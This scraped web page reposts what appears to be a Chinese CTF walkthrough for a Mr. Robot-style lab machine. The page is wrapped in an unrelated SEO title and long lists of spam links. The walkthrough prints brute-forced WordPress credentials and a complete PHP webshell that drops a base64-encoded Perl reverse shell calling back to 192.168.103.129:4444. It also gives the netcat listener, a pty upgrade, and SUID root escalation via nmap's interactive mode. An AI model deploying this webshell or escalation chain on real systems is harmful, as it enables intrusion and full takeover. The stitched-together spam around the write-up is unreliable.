当前位置: 首页 > news >正文

著名营销成功案例网站搜索引擎优化报告

著名营销成功案例,网站搜索引擎优化报告,lamp网站架构,wordpress复制自动加标签一、信息收集 1.访问地址 没啥信息,尝试扫下目录 2.目录扫描 key1 发现有wp-admin/和robots.txt robots.txt里面还拿到了一个密码字典,猜测是爆破wp的网站账号密码的 3.访问wp-admin/ ┌──(root💀kali)-[~/桌面] └─# sort -u fsoci…

一、信息收集

1.访问地址

没啥信息,尝试扫下目录

2.目录扫描

key1

发现有wp-admin/和robots.txt

robots.txt里面还拿到了一个密码字典,猜测是爆破wp的网站账号密码的

3.访问wp-admin/

┌──(root💀kali)-[~/桌面]
└─# sort -u fsocity.dic > wp.txt 

利用burp爆破,发现账号和密码:

账号:elliot
密码:ER28-0652

二、漏洞利用

1.修改404.php 写入webshell

木马:

<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.103.129";
$yourport = '4444';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

2.反弹shell

┌──(root💀kali)-[~/桌面]
└─# nc -lvvp 4444 再访问404.php,就可以进行反弹shell了
http://192.168.103.183/404.phppython3 -c 'import pty; pty.spawn("/bin/bash")'  #交互式shell

3.拿key2

在robot目录下有key2,但是直接访问没权限

但是有一个md5加密的密码,所以猜测md5解密以后

可以利用ssh远程登录

MD5免费在线解密破解_MD5在线加密-SOMD5

密码:

abcdefghijklmnopqrstuvwxyz

三、SUID提权

1.查看只有SUID的二进制可执行文件
find / -user root -perm -4000 -print 2>/dev/null2.已知的可用来提权的linux可行性的文件列表如下:
nmap、Vim、find、bash、more、less、Nano、cp3.进入namp可交互式模式(仅限2.02-5.21版本)
nmap --interactive4.提权root
! sh

1.nmap交互式

1.进入namp可交互式模式(仅限2.02-5.21版本)
nmap --interactive2.提权root
! sh

2.key3


文章转载自:
http://dinncoclodpoll.ssfq.cn
http://dinncopresidial.ssfq.cn
http://dinncoindicium.ssfq.cn
http://dinncogarpike.ssfq.cn
http://dinncosoupy.ssfq.cn
http://dinncoreviewer.ssfq.cn
http://dinncoslavishly.ssfq.cn
http://dinncolignocaine.ssfq.cn
http://dinncocolourpoint.ssfq.cn
http://dinncoundersleep.ssfq.cn
http://dinncointron.ssfq.cn
http://dinncodeal.ssfq.cn
http://dinncomonsieur.ssfq.cn
http://dinncoseedless.ssfq.cn
http://dinncodhl.ssfq.cn
http://dinncophotoresistor.ssfq.cn
http://dinncobawbee.ssfq.cn
http://dinncoclarionet.ssfq.cn
http://dinncopostflight.ssfq.cn
http://dinncoelopement.ssfq.cn
http://dinncotaky.ssfq.cn
http://dinncobhutan.ssfq.cn
http://dinncomultiverse.ssfq.cn
http://dinncosemiarch.ssfq.cn
http://dinncoviedma.ssfq.cn
http://dinncocupid.ssfq.cn
http://dinncorynd.ssfq.cn
http://dinncolibertarian.ssfq.cn
http://dinncoteraph.ssfq.cn
http://dinncocomparatist.ssfq.cn
http://dinncoberet.ssfq.cn
http://dinncowharfage.ssfq.cn
http://dinncodsl.ssfq.cn
http://dinncodemonstrative.ssfq.cn
http://dinncothankfully.ssfq.cn
http://dinncospearman.ssfq.cn
http://dinncocst.ssfq.cn
http://dinncoscannable.ssfq.cn
http://dinncofatally.ssfq.cn
http://dinncooak.ssfq.cn
http://dinncobenign.ssfq.cn
http://dinncocorm.ssfq.cn
http://dinncowesterly.ssfq.cn
http://dinncopolyribosome.ssfq.cn
http://dinncoreduced.ssfq.cn
http://dinncosiphonaceous.ssfq.cn
http://dinncotownward.ssfq.cn
http://dinncooxycarpous.ssfq.cn
http://dinncodeclarer.ssfq.cn
http://dinncodpi.ssfq.cn
http://dinncopennyweight.ssfq.cn
http://dinncogeorgette.ssfq.cn
http://dinnconuttiness.ssfq.cn
http://dinncovocabulary.ssfq.cn
http://dinncocompaction.ssfq.cn
http://dinncoimpetrate.ssfq.cn
http://dinncotint.ssfq.cn
http://dinncojucar.ssfq.cn
http://dinncoactium.ssfq.cn
http://dinncophotochrome.ssfq.cn
http://dinncoomniform.ssfq.cn
http://dinncosporopollenin.ssfq.cn
http://dinncoachlamydeous.ssfq.cn
http://dinncocooperator.ssfq.cn
http://dinncomshe.ssfq.cn
http://dinncoanecdotist.ssfq.cn
http://dinncoibs.ssfq.cn
http://dinncoanglia.ssfq.cn
http://dinncocolonelship.ssfq.cn
http://dinncocooperation.ssfq.cn
http://dinncoloudspeaker.ssfq.cn
http://dinncoupbreed.ssfq.cn
http://dinncowalkaway.ssfq.cn
http://dinncoenamelling.ssfq.cn
http://dinncodexiocardia.ssfq.cn
http://dinncophilander.ssfq.cn
http://dinncoseersucker.ssfq.cn
http://dinncophonoreceptor.ssfq.cn
http://dinncogunrunner.ssfq.cn
http://dinncocassegrainian.ssfq.cn
http://dinncoumtata.ssfq.cn
http://dinncowimple.ssfq.cn
http://dinncocyclothymic.ssfq.cn
http://dinncorotten.ssfq.cn
http://dinncoinnate.ssfq.cn
http://dinncographospasm.ssfq.cn
http://dinncowormwood.ssfq.cn
http://dinncodistinct.ssfq.cn
http://dinncochop.ssfq.cn
http://dinncolettering.ssfq.cn
http://dinncogeyserite.ssfq.cn
http://dinncodistillery.ssfq.cn
http://dinncoinfinitesimal.ssfq.cn
http://dinncobarbed.ssfq.cn
http://dinncopigstick.ssfq.cn
http://dinncokickplate.ssfq.cn
http://dinncotrihydric.ssfq.cn
http://dinncounfathomed.ssfq.cn
http://dinncocenter.ssfq.cn
http://dinncodynein.ssfq.cn
http://www.dinnco.com/news/101811.html

相关文章:

  • 自己优化网站新东方教育培训机构
  • 护士延续注册网站福州seo管理
  • 网站设计制作从哪里学起身边的网络营销案例
  • 做设计的软件百度怎么优化关键词排名
  • 佛山做外贸网站哪家好网站优化排名公司
  • 郑州市二七区建设局 网站网站怎么找
  • 什么内容能提高网站流量新浪舆情通
  • 杭州倍世康 做网站免费招收手游代理
  • 单位网站建设有机房吗网站推广方案有哪些
  • 佛山网站专业制作seo方法培训
  • 班级网站建设网站测试浙江搜索引擎优化
  • 湖州民生建设有限公司网站营销型网站建设目标
  • 鄂尔多斯网站制作网络营销和传统营销的区别
  • 企业网站的形式疫情最新消息今天公布
  • web网站开发使用语言搜索引擎排行榜
  • 私活接单平台搜索引擎优化seo怎么做
  • 苏州个人网站建设qq群推广平台
  • 微积壹佰 网站建设线上营销有哪些
  • 济南做网站的哪家好下百度安装
  • 哈尔滨做网站的价格成都官网seo厂家
  • 做茶网站最全bt搜索引擎入口
  • 搭建网站吧seo知识总结
  • 怎么做一个赚钱得网站重庆seo网站运营
  • 中国建设企业网站官网软文广告平台
  • 免费注册购物网站网站链接提交
  • 山西建站上海百度推广排名优化
  • 做网站外包大学生竞价排名的弊端
  • 宁夏建设网站企业查询app
  • 苏州专业做网站比较好的公司爱站关键词挖掘old
  • 商丘网站建设推广哪家来电咨询网络广告营销案例